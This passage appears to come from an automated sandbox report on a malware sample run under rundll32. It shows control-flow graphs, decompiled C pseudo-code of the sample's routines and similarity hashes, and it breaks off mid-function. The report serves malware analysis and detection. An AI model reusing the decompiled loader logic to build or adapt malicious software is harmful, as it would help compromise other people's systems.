                                                                                                                                                                                                                                    control_flow_graph 186 31b225b-31b2276 call 31b550e 189 31b2278-31b2286 186->189 190 31b228c-31b229a 186->190 189->190 192 31b22ac-31b22c7 call 31b3d0d 190->192 193 31b229c-31b229f 190->193 198 31b22c9-31b22cf 192->198 199 31b22d1 192->199 193->192 194 31b22a1-31b22a6 193->194 194->192 197 31b242d 194->197 200 31b242f-31b2435 197->200 201 31b22d7-31b22ec call 31b1bf4 call 31b1b2f 198->201 199->201 206 31b22ee 201->206 207 31b22f7-31b22fc 201->207 206->207 208 31b22fe-31b2303 207->208 209 31b2322-31b233a call 31b2049 207->209 211 31b2419-31b241d 208->211 212 31b2309 208->212 217 31b233c-31b2364 call 31ba7bc 209->217 218 31b2366-31b2368 209->218 214 31b241f-31b2423 211->214 215 31b2425-31b242b 211->215 216 31b230c-31b231b call 31ba501 212->216 214->200 214->215 215->200 224 31b231d 216->224 222 31b2369-31b236d 217->222 218->222 222->211 226 31b2373-31b2389 222->226 224->211 229 31b238b-31b23b7 226->229 230 31b23b9-31b23bb 226->230 231 31b23bc-31b23c0 229->231 230->231 231->211 233 31b23c2-31b23e2 call 31b269c call 31b4094 231->233 233->211 238 31b23e4-31b23eb call 31b96a4 233->238 241 31b23ed-31b23f0 238->241 242 31b23f2-31b23f9 238->242 241->211 243 31b23fb-31b23fd 242->243 244 31b240e-31b2412 call 31b6786 242->244 243->211 246 31b23ff-31b2403 call 31b3dd9 243->246 247 31b2417 244->247 249 31b2408-31b240c 246->249 247->211 249->211 249->244
                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E031B225B(signed int __edx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				signed int _t32;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr* _t49;
				signed int _t51;
				signed char _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t59;
				signed int _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E031B550E();
				if(_t21 != 0) {
					_t56 =  *0x31bd25c; // 0x4000000a
					_t52 = (_t56 & 0xf0000000) + _t21;
					 *0x31bd25c = (_t56 & 0xf0000000) + _t21;
				}
				_t22 =  *0x31bd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E031B3D0D( &_v8,  &_v20); // executed
					_t51 = _t25;
					_t26 =  *0x31bd27c; // 0x1faa5a8
					if( *0x31bd25c > 5) {
						_t8 = _t26 + 0x31be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x31bea15; // 0x44283a44
						_t27 = _t7;
					}
					E031B1BF4(_t27, _t27);
					_t31 = E031B1B2F(_t58,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						__imp__(_v20);
					}
					_t59 = 5;
					if(_t51 != _t59) {
						 *0x31bd270 =  *0x31bd270 ^ 0x81bbe65d;
						_t32 = E031B2049(_t31, 0x60);
						__eflags = _t32;
						 *0x31bd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							L031BA7BC();
							_t47 =  *0x31bd32c; // 0x51695b0
							_t65 = _t65 + 0xc;
							__imp__(_t47 + 0x40, _t32, 0, 0x60);
							_t49 =  *0x31bd32c; // 0x51695b0
							 *_t49 = 0x31be836;
						}
						__eflags = 0;
						_t51 = 0;
						if(0 == 0) {
							__imp__( *0x31bd238, 0, 0x43);
							__eflags = 0;
							 *0x31bd2c4 = 0;
							if(0 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t53 =  *0x31bd25c; // 0x4000000a
								_t58 = _t53 & 0x000000ff;
								_t55 =  *0x31bd27c; // 0x1faa5a8
								_t13 = _t55 + 0x31be55a; // 0x697a6f4d
								_t52 = _t13;
								 *0x31bd120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x31bc2a7);
							}
							__eflags = 0;
							_t51 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E031B269C( ~_v8 &  *0x31bd270, 0x31bd00c); // executed
								_t41 = E031B4094(_t52); // executed
								_t51 = _t41;
								__eflags = _t51;
								if(_t51 != 0) {
									goto L30;
								}
								_t42 = E031B96A4(_t52); // executed
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t62 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E031B6786(_t58, _t62, _v8); // executed
										_t51 = _t43;
										goto L30;
									}
									__eflags = _t62;
									if(__eflags == 0) {
										goto L30;
									}
									_t45 = E031B3DD9(__eflags, _t62 + 4); // executed
									_t51 = _t45;
									__eflags = _t51;
									if(_t51 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t51 = 8;
							}
						}
					} else {
						_t63 = _v12;
						if(_t63 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x31bd160();
							}
							goto L34;
						}
						_t64 = _t63 + 4;
						do {
						} while (E031BA501(_t59, _t64, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t51 = _t22;
					L34:
					return _t51;
				}
			}































                                                                                                                                                                                                                                    0x031b225b
                                                                                                                                                                                                                                    0x031b2266
                                                                                                                                                                                                                                    0x031b2269
                                                                                                                                                                                                                                    0x031b226c
                                                                                                                                                                                                                                    0x031b226f
                                                                                                                                                                                                                                    0x031b2276
                                                                                                                                                                                                                                    0x031b2278
                                                                                                                                                                                                                                    0x031b2284
                                                                                                                                                                                                                                    0x031b2286
                                                                                                                                                                                                                                    0x031b2286
                                                                                                                                                                                                                                    0x031b228f
                                                                                                                                                                                                                                    0x031b2297
                                                                                                                                                                                                                                    0x031b229a
                                                                                                                                                                                                                                    0x031b22b4
                                                                                                                                                                                                                                    0x031b22c0
                                                                                                                                                                                                                                    0x031b22c2
                                                                                                                                                                                                                                    0x031b22c7
                                                                                                                                                                                                                                    0x031b22d1
                                                                                                                                                                                                                                    0x031b22d1
                                                                                                                                                                                                                                    0x031b22c9
                                                                                                                                                                                                                                    0x031b22c9
                                                                                                                                                                                                                                    0x031b22c9
                                                                                                                                                                                                                                    0x031b22c9
                                                                                                                                                                                                                                    0x031b22d8
                                                                                                                                                                                                                                    0x031b22e5
                                                                                                                                                                                                                                    0x031b22ec
                                                                                                                                                                                                                                    0x031b22f1
                                                                                                                                                                                                                                    0x031b22f1
                                                                                                                                                                                                                                    0x031b22f9
                                                                                                                                                                                                                                    0x031b22fc
                                                                                                                                                                                                                                    0x031b2322
                                                                                                                                                                                                                                    0x031b232e
                                                                                                                                                                                                                                    0x031b2333
                                                                                                                                                                                                                                    0x031b2335
                                                                                                                                                                                                                                    0x031b233a
                                                                                                                                                                                                                                    0x031b2366
                                                                                                                                                                                                                                    0x031b2368
                                                                                                                                                                                                                                    0x031b233c
                                                                                                                                                                                                                                    0x031b2340
                                                                                                                                                                                                                                    0x031b2345
                                                                                                                                                                                                                                    0x031b234a
                                                                                                                                                                                                                                    0x031b2351
                                                                                                                                                                                                                                    0x031b2357
                                                                                                                                                                                                                                    0x031b235c
                                                                                                                                                                                                                                    0x031b2362
                                                                                                                                                                                                                                    0x031b2369
                                                                                                                                                                                                                                    0x031b236b
                                                                                                                                                                                                                                    0x031b236d
                                                                                                                                                                                                                                    0x031b237c
                                                                                                                                                                                                                                    0x031b2382
                                                                                                                                                                                                                                    0x031b2384
                                                                                                                                                                                                                                    0x031b2389
                                                                                                                                                                                                                                    0x031b23b9
                                                                                                                                                                                                                                    0x031b23bb
                                                                                                                                                                                                                                    0x031b238b
                                                                                                                                                                                                                                    0x031b238b
                                                                                                                                                                                                                                    0x031b2391
                                                                                                                                                                                                                                    0x031b239e
                                                                                                                                                                                                                                    0x031b23a4
                                                                                                                                                                                                                                    0x031b23a4
                                                                                                                                                                                                                                    0x031b23ac
                                                                                                                                                                                                                                    0x031b23b5
                                                                                                                                                                                                                                    0x031b23bc
                                                                                                                                                                                                                                    0x031b23be
                                                                                                                                                                                                                                    0x031b23c0
                                                                                                                                                                                                                                    0x031b23c7
                                                                                                                                                                                                                                    0x031b23d4
                                                                                                                                                                                                                                    0x031b23d9
                                                                                                                                                                                                                                    0x031b23de
                                                                                                                                                                                                                                    0x031b23e0
                                                                                                                                                                                                                                    0x031b23e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b23e4
                                                                                                                                                                                                                                    0x031b23e9
                                                                                                                                                                                                                                    0x031b23eb
                                                                                                                                                                                                                                    0x031b23f2
                                                                                                                                                                                                                                    0x031b23f6
                                                                                                                                                                                                                                    0x031b23f9
                                                                                                                                                                                                                                    0x031b240e
                                                                                                                                                                                                                                    0x031b2412
                                                                                                                                                                                                                                    0x031b2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2417
                                                                                                                                                                                                                                    0x031b23fb
                                                                                                                                                                                                                                    0x031b23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2403
                                                                                                                                                                                                                                    0x031b2408
                                                                                                                                                                                                                                    0x031b240a
                                                                                                                                                                                                                                    0x031b240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b240c
                                                                                                                                                                                                                                    0x031b23ef
                                                                                                                                                                                                                                    0x031b23ef
                                                                                                                                                                                                                                    0x031b23c0
                                                                                                                                                                                                                                    0x031b22fe
                                                                                                                                                                                                                                    0x031b22fe
                                                                                                                                                                                                                                    0x031b2303
                                                                                                                                                                                                                                    0x031b2419
                                                                                                                                                                                                                                    0x031b241d
                                                                                                                                                                                                                                    0x031b2425
                                                                                                                                                                                                                                    0x031b2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b241d
                                                                                                                                                                                                                                    0x031b2309
                                                                                                                                                                                                                                    0x031b230c
                                                                                                                                                                                                                                    0x031b2316
                                                                                                                                                                                                                                    0x031b231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b242d
                                                                                                                                                                                                                                    0x031b242d
                                                                                                                                                                                                                                    0x031b2431
                                                                                                                                                                                                                                    0x031b2435
                                                                                                                                                                                                                                    0x031b2435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 11952dba3c17b916c39bd272b776746ef77edfecb138356ef2e1e7500d798f2c
                                                                                                                                                                                                                                    • Instruction ID: 378a20251d5a4016f5bea4c4a5148330c9c243b8f5505a2873e6f47449de1fde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11952dba3c17b916c39bd272b776746ef77edfecb138356ef2e1e7500d798f2c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7351D975A10215ABDB29EFA5EC84BDE77BCAB0C704F1848A6E501D7240F774D98ACB70
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B3DD9, Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 250 31b3dd9-31b3e1b call 31ba7bc call 31b6a12 255 31b3f69-31b3f6b 250->255 256 31b3e21-31b3e2c 250->256 257 31b3f6c-31b3f72 255->257 259 31b3e33-31b3e35 256->259 260 31b3e3b-31b3e47 call 31ba72d 259->260 261 31b3f5c-31b3f5e 259->261 267 31b3e49 260->267 268 31b3e4c-31b3e5e call 31b809f 260->268 262 31b3f5f-31b3f67 call 31b9039 261->262 262->257 267->268 271 31b3f4b-31b3f4d 268->271 272 31b3e64-31b3e80 call 31b809f 268->272 274 31b3f4e-31b3f53 271->274 277 31b3e82-31b3e9f call 31b6bfa call 31b9039 272->277 278 31b3ea1-31b3ea3 272->278 274->262 276 31b3f55-31b3f5a call 31b1f99 274->276 276->262 282 31b3ea4-31b3ea6 277->282 278->282 284 31b3eac-31b3eb3 282->284 285 31b3f41-31b3f49 call 31b9039 282->285 288 31b3eb5-31b3ecc call 31b809f 284->288 289 31b3ef4-31b3f1f call 31b8f83 call 31b1c74 284->289 285->274 297 31b3ece-31b3eeb call 31b6bfa call 31b9039 288->297 298 31b3eed-31b3eef 288->298 303 31b3f39-31b3f3c call 31b9039 289->303 304 31b3f21-31b3f37 call 31b42ea 289->304 299 31b3ef0-31b3ef2 297->299 298->299 299->285 299->289 303->285 304->303
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E031B3DD9(void* __eflags, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t60;
				void* _t70;
				intOrPtr _t75;

				_push(0x2c);
				_push(0);
				_push( &_v84);
				_v88 = 0;
				L031BA7BC();
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t39 =  *0x31bd27c; // 0x1faa5a8
				_t5 = _t39 + 0x31bee40; // 0x410025
				_t41 = E031B6A12(_t5);
				_t75 = _t41;
				_v16 = _t75;
				if(_t75 == 0) {
					_t70 = 8;
					L24:
					return _t70;
				}
				__imp__(_t75);
				_t43 =  *0x31bd114(_t75, _a4, _t41); // executed
				if(_t43 != 0) {
					_t70 = 1;
					L22:
					E031B9039(_t43, _v16);
					goto L24;
				}
				if(E031BA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t43 = E031B809F(0,  *0x31bd33c);
				_v12 = _t43;
				if(_t43 == 0) {
					_t70 = 8;
					goto L19;
				} else {
					_t48 =  *0x31bd27c; // 0x1faa5a8
					_t11 = _t48 + 0x31be81a; // 0x65696c43
					_t51 = E031B809F(0, _t11);
					_t77 = _t51;
					if(_t51 == 0) {
						_t70 = 8;
					} else {
						_t70 = E031B6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
						_t51 = E031B9039(_t68, _t77);
					}
					if(_t70 != 0) {
						L17:
						_t43 = E031B9039(_t51, _v12);
						L19:
						_t76 = _a4;
						if(_a4 != 0) {
							_t43 = E031B1F99(_t76);
						}
						goto L22;
					} else {
						if(( *0x31bd260 & 0x00000001) == 0) {
							L14:
							E031B8F83(_t70, _v88, _v84,  *0x31bd270, 0);
							_t70 = E031B1C74(_v88,  &_v80,  &_v76, 0);
							if(_t70 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t70 = E031B42EA( &_v40, 0);
							}
							_t51 = E031B9039(_t56, _v88);
							goto L17;
						}
						_t60 =  *0x31bd27c; // 0x1faa5a8
						_t18 = _t60 + 0x31be823; // 0x65696c43
						_t51 = E031B809F(0, _t18);
						_t79 = _t51;
						if(_t51 == 0) {
							_t70 = 8;
						} else {
							_t70 = E031B6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
							_t51 = E031B9039(_t65, _t79);
						}
						if(_t70 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                                                                                                                                                                                                                    0x031b3de4
                                                                                                                                                                                                                                    0x031b3de9
                                                                                                                                                                                                                                    0x031b3dea
                                                                                                                                                                                                                                    0x031b3deb
                                                                                                                                                                                                                                    0x031b3dee
                                                                                                                                                                                                                                    0x031b3df5
                                                                                                                                                                                                                                    0x031b3dfb
                                                                                                                                                                                                                                    0x031b3dfc
                                                                                                                                                                                                                                    0x031b3dfd
                                                                                                                                                                                                                                    0x031b3dfe
                                                                                                                                                                                                                                    0x031b3dff
                                                                                                                                                                                                                                    0x031b3e00
                                                                                                                                                                                                                                    0x031b3e08
                                                                                                                                                                                                                                    0x031b3e0f
                                                                                                                                                                                                                                    0x031b3e14
                                                                                                                                                                                                                                    0x031b3e18
                                                                                                                                                                                                                                    0x031b3e1b
                                                                                                                                                                                                                                    0x031b3f6b
                                                                                                                                                                                                                                    0x031b3f6e
                                                                                                                                                                                                                                    0x031b3f72
                                                                                                                                                                                                                                    0x031b3f72
                                                                                                                                                                                                                                    0x031b3e22
                                                                                                                                                                                                                                    0x031b3e2d
                                                                                                                                                                                                                                    0x031b3e35
                                                                                                                                                                                                                                    0x031b3f5e
                                                                                                                                                                                                                                    0x031b3f5f
                                                                                                                                                                                                                                    0x031b3f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3f62
                                                                                                                                                                                                                                    0x031b3e47
                                                                                                                                                                                                                                    0x031b3e49
                                                                                                                                                                                                                                    0x031b3e49
                                                                                                                                                                                                                                    0x031b3e54
                                                                                                                                                                                                                                    0x031b3e5b
                                                                                                                                                                                                                                    0x031b3e5e
                                                                                                                                                                                                                                    0x031b3f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3e64
                                                                                                                                                                                                                                    0x031b3e64
                                                                                                                                                                                                                                    0x031b3e69
                                                                                                                                                                                                                                    0x031b3e72
                                                                                                                                                                                                                                    0x031b3e77
                                                                                                                                                                                                                                    0x031b3e80
                                                                                                                                                                                                                                    0x031b3ea3
                                                                                                                                                                                                                                    0x031b3e82
                                                                                                                                                                                                                                    0x031b3e98
                                                                                                                                                                                                                                    0x031b3e9a
                                                                                                                                                                                                                                    0x031b3e9a
                                                                                                                                                                                                                                    0x031b3ea6
                                                                                                                                                                                                                                    0x031b3f41
                                                                                                                                                                                                                                    0x031b3f44
                                                                                                                                                                                                                                    0x031b3f4e
                                                                                                                                                                                                                                    0x031b3f4e
                                                                                                                                                                                                                                    0x031b3f53
                                                                                                                                                                                                                                    0x031b3f55
                                                                                                                                                                                                                                    0x031b3f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3eac
                                                                                                                                                                                                                                    0x031b3eb3
                                                                                                                                                                                                                                    0x031b3ef4
                                                                                                                                                                                                                                    0x031b3f05
                                                                                                                                                                                                                                    0x031b3f1b
                                                                                                                                                                                                                                    0x031b3f1f
                                                                                                                                                                                                                                    0x031b3f24
                                                                                                                                                                                                                                    0x031b3f2a
                                                                                                                                                                                                                                    0x031b3f37
                                                                                                                                                                                                                                    0x031b3f37
                                                                                                                                                                                                                                    0x031b3f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3f3c
                                                                                                                                                                                                                                    0x031b3eb5
                                                                                                                                                                                                                                    0x031b3eba
                                                                                                                                                                                                                                    0x031b3ec3
                                                                                                                                                                                                                                    0x031b3ec8
                                                                                                                                                                                                                                    0x031b3ecc
                                                                                                                                                                                                                                    0x031b3eef
                                                                                                                                                                                                                                    0x031b3ece
                                                                                                                                                                                                                                    0x031b3ee4
                                                                                                                                                                                                                                    0x031b3ee6
                                                                                                                                                                                                                                    0x031b3ee6
                                                                                                                                                                                                                                    0x031b3ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b3ef2
                                                                                                                                                                                                                                    0x031b3ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cbc47699cc397add9b8b76a1d51acfdf66563a0991e2f1bf03e40e1169e6d0f3
                                                                                                                                                                                                                                    • Instruction ID: 274dd6c54133265cdfcfb8c3230f81177c1e1f1fe1489b7edb685bee04419e3d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbc47699cc397add9b8b76a1d51acfdf66563a0991e2f1bf03e40e1169e6d0f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5417C7AA00318ABDB11EFE4DC84DEEBBBDEF0C640B054566E911EB110E771DE558BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B163F, Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 310 31b163f-31b168b 312 31b17af-31b17b2 310->312 313 31b1691-31b16bd 310->313 314 31b17bd-31b17c0 312->314 315 31b17b4 312->315 319 31b17ac 313->319 320 31b16c3-31b16cf call 31b2436 313->320 316 31b17cb-31b17d2 314->316 317 31b17c2 314->317 315->314 317->316 319->312 320->319 323 31b16d5-31b16e5 320->323 323->319 325 31b16eb-31b1711 323->325 325->319 328 31b1717-31b172b 325->328 330 31b1769-31b176c 328->330 331 31b172d-31b1730 328->331 332 31b176e-31b1773 330->332 333 31b17a3-31b17a8 330->333 331->330 334 31b1732-31b1749 331->334 332->333 335 31b1775-31b1780 call 31b1a70 332->335 333->319 338 31b174b-31b1754 call 31b52f9 334->338 339 31b1760 334->339 340 31b1785-31b1789 335->340 338->339 346 31b1756-31b175e call 31b2436 338->346 339->330 340->333 342 31b178b-31b1790 340->342 344 31b179e 342->344 345 31b1792-31b179c 342->345 344->333 345->333 346->339
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ff485f5616df63ffbef05080654aad184936fd6d98ad6234068300044721c449
                                                                                                                                                                                                                                    • Instruction ID: 9914aab0b2503623bed2db8aaf8608f7ce91557dd5aa0ab747a8533d59aa7994
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff485f5616df63ffbef05080654aad184936fd6d98ad6234068300044721c449
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051DA7A91020ABFCB10DFE4C8948EEB7B6BF8C340B198979E505AB214D771AD45CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B6786, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 349 31b6786-31b67b2 call 31ba7bc 353 31b67b8-31b6808 call 31bb0c8 349->353 354 31b6913-31b6919 349->354 361 31b680a-31b680d 353->361 362 31b6883-31b6888 353->362 358 31b691c-31b6923 354->358 363 31b6818 361->363 364 31b680f call 31b73fd 361->364 365 31b6889-31b688d 362->365 369 31b6822 363->369 370 31b6814-31b6816 364->370 367 31b688f-31b6891 365->367 368 31b689d-31b68a1 365->368 367->368 368->365 371 31b68a3-31b68ac 368->371 372 31b6825-31b6829 369->372 370->363 370->369 371->358 373 31b683b-31b6864 call 31b8504 372->373 374 31b682b-31b6832 372->374 379 31b68ae-31b68b3 373->379 380 31b6866-31b686f 373->380 374->373 376 31b6834 374->376 376->373 382 31b68d2-31b68da 379->382 383 31b68b5-31b68bb 379->383 380->372 381 31b6871-31b6880 call 31b3bf1 380->381 381->362 385 31b68e0-31b68f3 call 31bb0c8 382->385 383->362 386 31b68bd-31b68d0 call 31ba1b0 383->386 392 31b68f8-31b6908 385->392 386->385 392->372 394 31b690e 392->394 394->362
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E031B6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v88;
				char _v92;
				char* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t59;
				signed int _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t44 =  &_v88;
				_v92 = 0;
				L031BA7BC();
				__imp__(0, 1, 0, _t44, 0, 0x2c);
				_v44 = _t44;
				if(_t44 == 0) {
					__imp__();
					_v8 = _t44;
				} else {
					_v20 = 0;
					_v16 = 0;
					L031BB0C8();
					_t72 = __imp__; // 0x76d7f710
					_v36 = _t44;
					_v32 = __edx;
					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x31bd240, 0, 0xff676980, 0xffffffff);
					_t48 =  *0x31bd26c; // 0x2d0
					_t64 = __imp__; // 0x76d7f730
					_v40 = _t48;
					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
					_v8 = _t50;
					if(_t50 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x31bd24c = 5;
						} else {
							_t63 = E031B73FD(__edx); // executed
							if(_t63 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x31bd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t66 = _v12;
						_t53 = _t66 << 4;
						_t71 = _t75 + (_t66 << 4) - 0x54;
						_t67 = _t66 + 1;
						_v24 = _t66 + 1;
						_t55 = E031B8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E031B3BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x31bd244);
							goto L21;
						} else {
							__eflags =  *0x31bd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E031BA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x31bd248);
								L21:
								L031BB0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x31bd238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
